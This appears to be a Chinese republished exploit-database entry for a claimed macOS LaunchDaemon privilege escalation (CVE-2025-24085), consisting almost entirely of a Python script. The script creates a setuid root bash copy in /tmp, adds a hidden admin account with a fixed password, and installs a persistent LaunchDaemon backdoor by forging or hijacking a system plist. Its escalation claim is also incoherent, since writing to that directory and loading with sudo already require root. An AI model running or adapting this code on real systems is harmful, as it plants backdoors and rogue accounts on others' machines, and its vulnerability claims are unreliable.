macOS LaunchDaemon权限提升漏洞分析与利用

Tue, 25 Nov 2025 03:36:49 +0800

macOS LaunchDaemon iOS 17.2 权限提升

2025年6月26日
作者：Mohammed Idrees Banyamer

风险等级： 中等
本地利用： 是
远程利用： 否
CVE： CVE-2025-24085
CWE： CWE-264

#!/usr/bin/env python3
# 漏洞标题：macOS LaunchDaemon iOS 17.2 - 权限提升
# 作者：Mohammed Idrees Banyamer (@banyamer_security)
# GitHub：https://github.com/mbanyamer
# 日期：2025-05-31
# 测试环境：macOS Sonoma (14.x ARM64 / x86_64)
# CVE：CVE-2025-24085
# 类型：本地权限提升
# 平台：macOS
# 作者国家：约旦
# 描述：
# 此本地权限提升漏洞利用利用存在漏洞的macOS LaunchDaemon plist配置，
# 以root权限执行任意命令。漏洞利用创建root payload脚本，添加root shell二进制文件，
# 创建管理员用户，并安装持久性LaunchDaemon后门以获取root访问权限。
# 它劫持com.apple.securemonitor LaunchDaemon plist来触发payload，
# 允许在macOS Sonoma系统上未经授权提升至root权限。

import os
import plistlib
import time
from pathlib import Path

LAUNCHD_PLIST = "/Library/LaunchDaemons/com.apple.securemonitor.plist"
PAYLOAD_SCRIPT = "/tmp/.macroot_payload.sh"

def create_payload():
    print("[+] 创建root payload脚本...")
    payload = """#!/bin/bash
# Root shell
cp /bin/bash /tmp/.rootbash
chmod +s /tmp/.rootbash
chown root:wheel /tmp/.rootbash

# 添加管理员用户
sysadminctl -addUser pentest -password macOS123! -admin

# 日志文件
echo "[+] Root后门在 $(date) 触发" >> /tmp/.rootlog

# 持久性后门
cat <<EOF > /Library/LaunchDaemons/com.apple.backdoor.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.apple.backdoor</string>
  <key>ProgramArguments</key><array><string>/tmp/.rootbash</string></array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
EOF
chmod 644 /Library/LaunchDaemons/com.apple.backdoor.plist
chown root:wheel /Library/LaunchDaemons/com.apple.backdoor.plist
"""
    with open(PAYLOAD_SCRIPT, "w") as f:
        f.write(payload)
    os.chmod(PAYLOAD_SCRIPT, 0o755)

def hijack_launchdaemon():
    print("[+] 劫持LaunchDaemon plist...")
    if not Path(LAUNCHD_PLIST).exists():
        # 创建伪造的plist
        print("[*] 为漏洞利用创建伪造的LaunchDaemon plist...")
        plist_data = {
            'Label': 'com.apple.securemonitor',
            'ProgramArguments': [PAYLOAD_SCRIPT],
            'RunAtLoad': True,
        }
        with open(LAUNCHD_PLIST, "wb") as f:
            plistlib.dump(plist_data, f)
    else:
        # 劫持现有的plist
        with open(LAUNCHD_PLIST, 'rb') as f:
            plist = plistlib.load(f)
        plist['ProgramArguments'] = [PAYLOAD_SCRIPT]
        plist['RunAtLoad'] = True
        with open(LAUNCHD_PLIST, 'wb') as f:
            plistlib.dump(plist, f)

    os.system(f"chmod 644 {LAUNCHD_PLIST}")
    os.system(f"chown root:wheel {LAUNCHD_PLIST}")

def trigger_payload():
    print("[+] 手动触发LaunchDaemon...")
    os.system(f"sudo launchctl load -w {LAUNCHD_PLIST}")
    print("[+] 完成。现在可以执行 /tmp/.rootbash -p 获取root shell")

def main():
    if os.geteuid() == 0:
        print("[!] 您已经是root用户。无需利用。")
        return
    create_payload()
    hijack_launchdaemon()
    print("[+] 漏洞利用完成。重启或手动运行：")
    print(f"    sudo launchctl load -w {LAUNCHD_PLIST}")
    print("    然后运行：/tmp/.rootbash -p")

if __name__ == "__main__":
    main()

LaunchDaemon on 办公AI智能小助手

macOS LaunchDaemon权限提升漏洞分析与利用

macOS LaunchDaemon iOS 17.2 权限提升